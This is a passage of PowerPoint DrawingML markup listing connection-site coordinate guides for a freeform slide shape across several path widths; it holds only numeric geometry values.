              <a:gd name="connsiteY147" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 48685 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 13677 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 48246 w 1556785"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1556785 w 1556785"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1556785 w 1556785"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 105420 w 1556785"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 105561 w 1556785"/>
              <a:gd name="connsiteY4" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 117610 w 1556785"/>
              <a:gd name="connsiteY5" fmla="*/ 6809549 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 149821 w 1556785"/>
              <a:gd name="connsiteY6" fmla="*/ 6715115 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 159672 w 1556785"/>
              <a:gd name="connsiteY7" fmla="*/ 6680170 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 185222 w 1556785"/>
              <a:gd name="connsiteY8" fmla="*/ 6621207 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 201879 w 1556785"/>
              <a:gd name="connsiteY9" fmla="*/ 6596265 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 201758 w 1556785"/>
              <a:gd name="connsiteY10" fmla="*/ 6594818 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 206003 w 1556785"/>
              <a:gd name="connsiteY11" fmla="*/ 6593735 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 209200 w 1556785"/>
              <a:gd name="connsiteY12" fmla="*/ 6589172 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 212494 w 1556785"/>
              <a:gd name="connsiteY13" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 212834 w 1556785"/>
              <a:gd name="connsiteY14" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 215243 w 1556785"/>
              <a:gd name="connsiteY15" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 215588 w 1556785"/>
              <a:gd name="connsiteY16" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 217285 w 1556785"/>
              <a:gd name="connsiteY17" fmla="*/ 6553006 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 221981 w 1556785"/>
              <a:gd name="connsiteY18" fmla="*/ 6514360 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 263635 w 1556785"/>
              <a:gd name="connsiteY19" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 274324 w 1556785"/>
              <a:gd name="connsiteY20" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 281557 w 1556785"/>
              <a:gd name="connsiteY21" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 282992 w 1556785"/>
              <a:gd name="connsiteY22" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 287350 w 1556785"/>
              <a:gd name="connsiteY23" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 290226 w 1556785"/>
              <a:gd name="connsiteY24" fmla="*/ 6410269 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 290126 w 1556785"/>
              <a:gd name="connsiteY25" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 291643 w 1556785"/>
              <a:gd name="connsiteY26" fmla="*/ 6372381 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 288837 w 1556785"/>
              <a:gd name="connsiteY27" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 292717 w 1556785"/>
              <a:gd name="connsiteY28" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 294382 w 1556785"/>
              <a:gd name="connsiteY29" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 310416 w 1556785"/>
              <a:gd name="connsiteY30" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 321179 w 1556785"/>
              <a:gd name="connsiteY31" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 362674 w 1556785"/>
              <a:gd name="connsiteY32" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 366967 w 1556785"/>
              <a:gd name="connsiteY33" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 393747 w 1556785"/>
              <a:gd name="connsiteY34" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 427759 w 1556785"/>
              <a:gd name="connsiteY35" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 459595 w 1556785"/>
              <a:gd name="connsiteY36" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 479650 w 1556785"/>
              <a:gd name="connsiteY37" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 513367 w 1556785"/>
              <a:gd name="connsiteY38" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 542872 w 1556785"/>
              <a:gd name="connsiteY39" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 574065 w 1556785"/>
              <a:gd name="connsiteY40" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 590046 w 1556785"/>
              <a:gd name="connsiteY41" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 623539 w 1556785"/>
              <a:gd name="connsiteY42" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 633138 w 1556785"/>
              <a:gd name="connsiteY43" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 644364 w 1556785"/>
              <a:gd name="connsiteY44" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 645384 w 1556785"/>
              <a:gd name="connsiteY45" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 652725 w 1556785"/>
              <a:gd name="connsiteY46" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 656028 w 1556785"/>
              <a:gd name="connsiteY47" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 657012 w 1556785"/>
              <a:gd name="connsiteY48" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 652646 w 1556785"/>
              <a:gd name="connsiteY49" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 659323 w 1556785"/>
              <a:gd name="connsiteY50" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 656256 w 1556785"/>
              <a:gd name="connsiteY51" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 663086 w 1556785"/>
              <a:gd name="connsiteY52" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 670122 w 1556785"/>
              <a:gd name="connsiteY53" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 672853 w 1556785"/>
              <a:gd name="connsiteY54" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 669557 w 1556785"/>
              <a:gd name="connsiteY55" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 671111 w 1556785"/>
              <a:gd name="connsiteY56" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 678020 w 1556785"/>
              <a:gd name="connsiteY57" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 673876 w 1556785"/>
              <a:gd name="connsiteY58" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 689279 w 1556785"/>
              <a:gd name="connsiteY59" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 683433 w 1556785"/>
              <a:gd name="connsiteY60" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 691102 w 1556785"/>
              <a:gd name="connsiteY61" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 692396 w 1556785"/>
              <a:gd name="connsiteY62" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 694180 w 1556785"/>
              <a:gd name="connsiteY63" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 702967 w 1556785"/>
              <a:gd name="connsiteY64" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 699015 w 1556785"/>
              <a:gd name="connsiteY65" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 694495 w 1556785"/>
              <a:gd name="connsiteY66" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 689578 w 1556785"/>
              <a:gd name="connsiteY67" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 686143 w 1556785"/>
              <a:gd name="connsiteY68" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 666796 w 1556785"/>
              <a:gd name="connsiteY69" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 670869 w 1556785"/>
              <a:gd name="connsiteY70" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 656125 w 1556785"/>
              <a:gd name="connsiteY71" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 657274 w 1556785"/>
              <a:gd name="connsiteY72" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 655850 w 1556785"/>
              <a:gd name="connsiteY73" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 642145 w 1556785"/>
              <a:gd name="connsiteY74" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 643743 w 1556785"/>
              <a:gd name="connsiteY75" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 637165 w 1556785"/>
              <a:gd name="connsiteY76" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 638496 w 1556785"/>
              <a:gd name="connsiteY77" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 642850 w 1556785"/>
              <a:gd name="connsiteY78" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 647928 w 1556785"/>
              <a:gd name="connsiteY79" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 670522 w 1556785"/>
              <a:gd name="connsiteY80" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 669947 w 1556785"/>
              <a:gd name="connsiteY81" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 670254 w 1556785"/>
              <a:gd name="connsiteY82" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 670281 w 1556785"/>
              <a:gd name="connsiteY83" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 668896 w 1556785"/>
              <a:gd name="connsiteY84" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 667780 w 1556785"/>
              <a:gd name="connsiteY85" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 669513 w 1556785"/>
              <a:gd name="connsiteY86" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 673256 w 1556785"/>
              <a:gd name="connsiteY87" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 672722 w 1556785"/>
              <a:gd name="connsiteY88" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 681418 w 1556785"/>
              <a:gd name="connsiteY89" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 688764 w 1556785"/>
              <a:gd name="connsiteY90" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 688060 w 1556785"/>
              <a:gd name="connsiteY91" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 691503 w 1556785"/>
              <a:gd name="connsiteY92" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 699041 w 1556785"/>
              <a:gd name="connsiteY93" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 700712 w 1556785"/>
              <a:gd name="connsiteY94" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 718275 w 1556785"/>
              <a:gd name="connsiteY95" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 718700 w 1556785"/>
              <a:gd name="connsiteY96" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 720523 w 1556785"/>
              <a:gd name="connsiteY97" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 707358 w 1556785"/>
              <a:gd name="connsiteY98" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 707859 w 1556785"/>
              <a:gd name="connsiteY99" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 695459 w 1556785"/>
              <a:gd name="connsiteY100" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 680644 w 1556785"/>
              <a:gd name="connsiteY101" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 681309 w 1556785"/>
              <a:gd name="connsiteY102" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 672177 w 1556785"/>
              <a:gd name="connsiteY103" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 658786 w 1556785"/>
              <a:gd name="connsiteY104" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 631516 w 1556785"/>
              <a:gd name="connsiteY105" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 574130 w 1556785"/>
              <a:gd name="connsiteY106" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 523048 w 1556785"/>
              <a:gd name="connsiteY107" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 503142 w 1556785"/>
              <a:gd name="connsiteY108" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 493865 w 1556785"/>
              <a:gd name="connsiteY109" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 480826 w 1556785"/>
              <a:gd name="connsiteY110" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 486825 w 1556785"/>
              <a:gd name="connsiteY111" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 489437 w 1556785"/>
              <a:gd name="connsiteY112" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 465766 w 1556785"/>
              <a:gd name="connsiteY113" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 455653 w 1556785"/>
              <a:gd name="connsiteY114" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 439870 w 1556785"/>
              <a:gd name="connsiteY115" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 437328 w 1556785"/>
              <a:gd name="connsiteY116" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 438321 w 1556785"/>
              <a:gd name="connsiteY117" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 430127 w 1556785"/>
              <a:gd name="connsiteY118" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 411305 w 1556785"/>
              <a:gd name="connsiteY119" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 387862 w 1556785"/>
              <a:gd name="connsiteY120" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 341661 w 1556785"/>
              <a:gd name="connsiteY121" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 313972 w 1556785"/>
              <a:gd name="connsiteY122" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 313098 w 1556785"/>
              <a:gd name="connsiteY123" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 293893 w 1556785"/>
              <a:gd name="connsiteY124" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 306973 w 1556785"/>
              <a:gd name="connsiteY125" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 299715 w 1556785"/>
              <a:gd name="connsiteY126" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 285800 w 1556785"/>
              <a:gd name="connsiteY127" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 294107 w 1556785"/>
              <a:gd name="connsiteY128" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 295295 w 1556785"/>
              <a:gd name="connsiteY129" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 299980 w 1556785"/>
              <a:gd name="connsiteY130" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 292262 w 1556785"/>
              <a:gd name="connsiteY131" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 281568 w 1556785"/>
              <a:gd name="connsiteY132" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 270304 w 1556785"/>
              <a:gd name="connsiteY133" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 271760 w 1556785"/>
              <a:gd name="connsiteY134" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 273996 w 1556785"/>
              <a:gd name="connsiteY135" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 266625 w 1556785"/>
              <a:gd name="connsiteY136" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 236033 w 1556785"/>
              <a:gd name="connsiteY137" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 214983 w 1556785"/>
              <a:gd name="connsiteY138" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 214541 w 1556785"/>
              <a:gd name="connsiteY139" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 200212 w 1556785"/>
              <a:gd name="connsiteY140" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 185631 w 1556785"/>
              <a:gd name="connsiteY141" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 190642 w 1556785"/>
              <a:gd name="connsiteY142" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 176584 w 1556785"/>
              <a:gd name="connsiteY143" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 176265 w 1556785"/>
              <a:gd name="connsiteY144" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 155891 w 1556785"/>
              <a:gd name="connsiteY145" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 146327 w 1556785"/>
              <a:gd name="connsiteY146" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 152749 w 1556785"/>
              <a:gd name="connsiteY147" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 151970 w 1556785"/>
              <a:gd name="connsiteY148" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 141374 w 1556785"/>
              <a:gd name="connsiteY149" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 118394 w 1556785"/>
              <a:gd name="connsiteY150" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 75886 w 1556785"/>
              <a:gd name="connsiteY151" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 54558 w 1556785"/>
              <a:gd name="connsiteY152" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 45886 w 1556785"/>
              <a:gd name="connsiteY153" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 0 w 1556785"/>
              <a:gd name="connsiteY154" fmla="*/ 13677 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 48246 w 1556785"/>
              <a:gd name="connsiteY155" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 6323 w 1514862"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1514862 w 1514862"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1514862 w 1514862"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 63497 w 1514862"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 63638 w 1514862"/>
              <a:gd name="connsiteY4" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 75687 w 1514862"/>
              <a:gd name="connsiteY5" fmla="*/ 6809549 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 107898 w 1514862"/>
              <a:gd name="connsiteY6" fmla="*/ 6715115 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 117749 w 1514862"/>
              <a:gd name="connsiteY7" fmla="*/ 6680170 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 143299 w 1514862"/>
              <a:gd name="connsiteY8" fmla="*/ 6621207 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 159956 w 1514862"/>
              <a:gd name="connsiteY9" fmla="*/ 6596265 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 159835 w 1514862"/>
              <a:gd name="connsiteY10" fmla="*/ 6594818 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 164080 w 1514862"/>
              <a:gd name="connsiteY11" fmla="*/ 6593735 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 167277 w 1514862"/>
              <a:gd name="connsiteY12" fmla="*/ 6589172 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 170571 w 1514862"/>
              <a:gd name="connsiteY13" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 170911 w 1514862"/>
              <a:gd name="connsiteY14" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 173320 w 1514862"/>
              <a:gd name="connsiteY15" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 173665 w 1514862"/>
              <a:gd name="connsiteY16" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 175362 w 1514862"/>
              <a:gd name="connsiteY17" fmla="*/ 6553006 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 180058 w 1514862"/>
              <a:gd name="connsiteY18" fmla="*/ 6514360 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 221712 w 1514862"/>
              <a:gd name="connsiteY19" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 232401 w 1514862"/>
              <a:gd name="connsiteY20" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 239634 w 1514862"/>
              <a:gd name="connsiteY21" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 241069 w 1514862"/>
              <a:gd name="connsiteY22" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 245427 w 1514862"/>
              <a:gd name="connsiteY23" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 248303 w 1514862"/>
              <a:gd name="connsiteY24" fmla="*/ 6410269 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 248203 w 1514862"/>
              <a:gd name="connsiteY25" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 249720 w 1514862"/>
              <a:gd name="connsiteY26" fmla="*/ 6372381 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 246914 w 1514862"/>
              <a:gd name="connsiteY27" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 250794 w 1514862"/>
              <a:gd name="connsiteY28" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 252459 w 1514862"/>
              <a:gd name="connsiteY29" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 268493 w 1514862"/>
              <a:gd name="connsiteY30" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 279256 w 1514862"/>
              <a:gd name="connsiteY31" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 320751 w 1514862"/>
              <a:gd name="connsiteY32" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 325044 w 1514862"/>
              <a:gd name="connsiteY33" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 351824 w 1514862"/>
              <a:gd name="connsiteY34" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 385836 w 1514862"/>
              <a:gd name="connsiteY35" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 417672 w 1514862"/>
              <a:gd name="connsiteY36" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 437727 w 1514862"/>
              <a:gd name="connsiteY37" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471444 w 1514862"/>
              <a:gd name="connsiteY38" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 500949 w 1514862"/>
              <a:gd name="connsiteY39" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 532142 w 1514862"/>
              <a:gd name="connsiteY40" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 548123 w 1514862"/>
              <a:gd name="connsiteY41" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 581616 w 1514862"/>
              <a:gd name="connsiteY42" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 591215 w 1514862"/>
              <a:gd name="connsiteY43" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 602441 w 1514862"/>
              <a:gd name="connsiteY44" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 603461 w 1514862"/>
              <a:gd name="connsiteY45" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 610802 w 1514862"/>
              <a:gd name="connsiteY46" fmla="*/ 5193377 h 6858000"/>
